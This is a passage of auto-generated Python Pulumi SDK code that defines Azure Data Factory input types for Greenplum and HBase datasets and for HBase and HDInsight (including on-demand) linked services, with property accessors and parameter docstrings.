annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Greenplum Database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset. Expected value is 'GreenplumTable'.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'GreenplumTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset. Expected value is 'GreenplumTable'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HBaseLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
username: Optional[Any] = None):
"""
HBase server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism to use to connect to the HBase server.
:param Any host: The IP address or host name of the HBase server. (e.g. 192.168.222.160)
:param pulumi.Input[str] type: Type of linked service. Expected value is 'HBase'.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the HBase server. (e.g. /gateway/sandbox/hbase/version)
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the HBase instance uses to listen for client connections. The default value is 9090.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any username: The user name used to connect to the HBase instance.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'HBase')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism to use to connect to the HBase server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the HBase server. (e.g. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service. Expected value is 'HBase'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the HBase server. (e.g. /gateway/sandbox/hbase/version)
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the HBase instance uses to listen for client connections. The default value is 9090.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the HBase instance.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
HBase server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset. Expected value is 'HBaseObject'.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HBaseObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset. Expected value is 'HBaseObject'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HDInsightLinkedServiceArgs:
def __init__(__self__, *,
cluster_uri: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
hcatalog_linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
HDInsight linked service.
:param Any cluster_uri: HDInsight cluster URI. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service. Expected value is 'HDInsight'.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] hcatalog_linked_service_name: A reference to the Azure SQL linked service that points to the HCatalog database.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: The Azure Storage linked service reference.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: HDInsight cluster password.
:param Any user_name: HDInsight cluster user name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "cluster_uri", cluster_uri)
pulumi.set(__self__, "type", 'HDInsight')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if hcatalog_linked_service_name is not None:
pulumi.set(__self__, "hcatalog_linked_service_name", hcatalog_linked_service_name)
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="clusterUri")
def cluster_uri(self) -> Any:
"""
HDInsight cluster URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_uri")
@cluster_uri.setter
def cluster_uri(self, value: Any):
pulumi.set(self, "cluster_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service. Expected value is 'HDInsight'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hcatalogLinkedServiceName")
def hcatalog_linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
A reference to the Azure SQL linked service that points to the HCatalog database.
"""
return pulumi.get(self, "hcatalog_linked_service_name")
@hcatalog_linked_service_name.setter
def hcatalog_linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "hcatalog_linked_service_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
The Azure Storage linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
HDInsight cluster password.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
HDInsight cluster user name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HDInsightOnDemandLinkedServiceArgs:
def __init__(__self__, *,
cluster_resource_group: Any,
cluster_size: Any,
host_subscription_id: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
tenant: Any,
time_to_live: Any,
type: pulumi.Input[str],
version: Any,
additional_linked_service_names: Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
cluster_name_prefix: Optional[Any] = None,
cluster_password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
cluster_ssh_password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
cluster_ssh_user_name: Optional[Any] = None,
cluster_type: Optional[Any] = None,
cluster_user_name: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
core_configuration: Optional[Any] = None,
data_node_size: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
h_base_configuration: Optional[Any] = None,
hcatalog_linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
hdfs_configuration: Optional[Any] = None,
head_node_size: Optional[Any] = None,
hive_configuration: Optional[Any] = None,
map_reduce_configuration: Optional[Any] = None,
oozie_configuration: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
spark_version: Optional[Any] = None,
storm_configuration: Optional[Any] = None,
yarn_configuration: Optional[Any] = None,
zookeeper_node_size: Optional[Any] = None):
"""
HDInsight on-demand linked service.
:param Any cluster_resource_group: The resource group where the cluster belongs. Type: string (or Expression with resultType string).
:param Any cluster_size: Number of worker/data nodes in the cluster. Suggested value: 4. Type: string (or Expression with resultType string).
:param Any host_subscription_id: The customer’s subscription to host the cluster. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Azure Storage linked service to be used by the on-demand cluster for storing and processing data.
:param Any tenant: The Tenant id/name to which the service principal belongs. Type: string (or Expression with resultType string).
:param Any time_to_live: The allowed idle time for the on-demand HDInsight cluster. Specifies how long the on-demand HDInsight cluster stays alive after completion of an activity run if there are no other active jobs in the cluster. The minimum value is 5 mins. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service. Expected value is 'HDInsightOnDemand'.
:param Any version: Version of the HDInsight cluster. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]] additional_linked_service_names: Specifies additional storage accounts for the HDInsight linked service so that the Data Factory service can register them on your behalf.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any cluster_name_prefix: The prefix of the cluster name; a timestamp-based postfix keeps the name distinct. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] cluster_password: The password to access the cluster.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] cluster_ssh_password: The password used to remotely connect to the cluster’s node via SSH (for Linux).
:param Any cluster_ssh_user_name: The username used to remotely connect to the cluster’s node via SSH (for Linux). Type: string (or Expression with resultType string).
:param Any cluster_type: The cluster type. Type: string (or Expression with resultType string).
:param Any cluster_user_name: The username to access the cluster. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any core_configuration: Specifies the core configuration parameters (as in core-site.xml) for the HDInsight cluster to be created.
:param Any data_node_size: Specifies the size of the data node for the HDInsight cluster.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any h_base_configuration: Specifies the HBase configuration parameters (hbase-site.xml) for the HDInsight cluster.
:param pulumi.Input['LinkedServiceReferenceArgs'] hcatalog_linked_service_name: The name of the Azure SQL linked service that points to the HCatalog database. The on-demand HDInsight cluster is created by using the Azure SQL database as the metastore.
:param Any hdfs_configuration: Specifies the HDFS configuration parameters (hdfs-site.xml) for the HDInsight cluster.
:param Any head_node_size: Specifies the size of the head node for the HDInsight cluster.
:param Any hive_configuration: Specifies the Hive configuration parameters (hive-site.xml) for the HDInsight cluster.
:param Any map_reduce_configuration: Specifies the MapReduce configuration parameters (mapred-site.xml) for the HDInsight cluster.
:param Any oozie_configuration: Specifies the Oozie configuration parameters (oozie-site.xml) for the HDInsight cluster.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The service principal id for the hostSubscriptionId. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key for the service principal id.
:param Any spark_version: The version of Spark if the cluster type is 'spark'. Type: string (or Expression with resultType string).
:param Any storm_configuration: Specifies the Storm configuration parameters (storm-site.xml) for the HDInsight cluster.
:param Any yarn_configuration: Specifies the Yarn configuration parameters (yarn-site.xml) for the HDInsight cluster.
:param Any zookeeper_node_size: Specifies the size of the ZooKeeper node for the HDInsight cluster.
"""
pulumi.set(__self__, "cluster_resource_group", cluster_resource_group)
pulumi.set(__self__, "cluster_size", cluster_size)
pulumi.set(__self__, "host_subscription_id", host_subscription_id)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "tenant", tenant)
pulumi.set(__self__, "time_to_live", time_to_live)
pulumi.set(__self__, "type", 'HDInsightOnDemand')
pulumi.set(__self__, "version", version)
if additional_linked_service_names is not None:
pulumi.set(__self__, "additional_linked_service_names", additional_linked_service_names)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_name_prefix is not None:
pulumi.set(__self__, "cluster_name_prefix", cluster_name_prefix)
if cluster_password is not None:
pulumi.set(__self__, "cluster_password", cluster_password)
if cluster_ssh_password is not None:
pulumi.set(__self__, "cluster_ssh_password", cluster_ssh_password)
if cluster_ssh_user_name is not None:
pulumi.set(__self__, "cluster_ssh_user_name", cluster_ssh_user_name)
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if cluster_user_name is not None:
pulumi.set(__self__, "cluster_user_name", cluster_user_name)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if core_configuration is not None:
pulumi.set(__self__, "core_configuration", core_configuration)
if data_node_size is not None:
pulumi.set(__self__, "data_node_size", data_node_size)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if h_base_configuration is not None:
pulumi.set(__self__, "h_base_configuration", h_base_configuration)
if hcatalog_linked_service_name is not None:
pulumi.set(__self__, "hcatalog_linked_service_name", hcatalog_linked_service_name)
if hdfs_configuration is not None:
pulumi.set(__self__, "hdfs_configuration", hdfs_configuration)
if head_node_size is not None:
pulumi.set(__self__, "head_node_size", head_node_size)
if hive_configuration is not None:
pulumi.set(__self__, "hive_configuration", hive_configuration)
if map_reduce_configuration is not None:
pulumi.set(__self__, "map_reduce_configuration", map_reduce_configuration)
if oozie_configuration is not None:
pulumi.set(__self__, "oozie_configuration", oozie_configuration)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if storm_configuration is not None:
pulumi.set(__self__, "storm_configuration", storm_configuration)
if yarn_configuration is not None:
pulumi.set(__self__, "yarn_configuration", yarn_configuration)
if zookeeper_node_size is not None:
pulumi.set(__self__, "zookeeper_node_size", zookeeper_node_size)
@property
@pulumi.getter(name="clusterResourceGroup")
def cluster_resource_group(self) -> Any:
"""
The resource group where the cluster belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_resource_group")
@cluster_resource_group.setter
def cluster_resource_group(self, value: Any):
pulumi.set(self, "cluster_resource_group", value)
@property
@pulumi.getter(name="clusterSize")
def cluster_size(self) -> Any:
"""
Number of worker/data nodes in the cluster. Suggested value: 4. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_size")
@cluster_size.setter
def cluster_size(self, value: Any):
pulumi.set(self, "cluster_size", value)
@property
@pulumi.getter(name="hostSubscriptionId")
def host_subscription_id(self) -> Any:
"""
The customer’s subscription to host the cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_subscription_id")
@host_subscription_id.setter
def host_subscription_id(self, value: Any):
pulumi.set(self, "host_subscription_id", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Azure Storage linked service to be used by the on-demand cluster for storing and processing data.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def tenant(self) -> Any:
"""
The Tenant id/name to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Any):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter(name="timeToLive")
def time_to_live(self) -> Any:
"""
The allowed idle time for the on-demand HDInsight cluster. Specifies how long the on-demand HDInsight cluster stays alive after completion of an activity run if there are no other active jobs in the cluster. The minimum value is 5 mins. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "time_to_live")
@time_to_live.setter
def time_to_live(self, value: Any):
pulumi.set(self, "time_to_live", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service. Expected value is 'HDInsightOnDemand'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
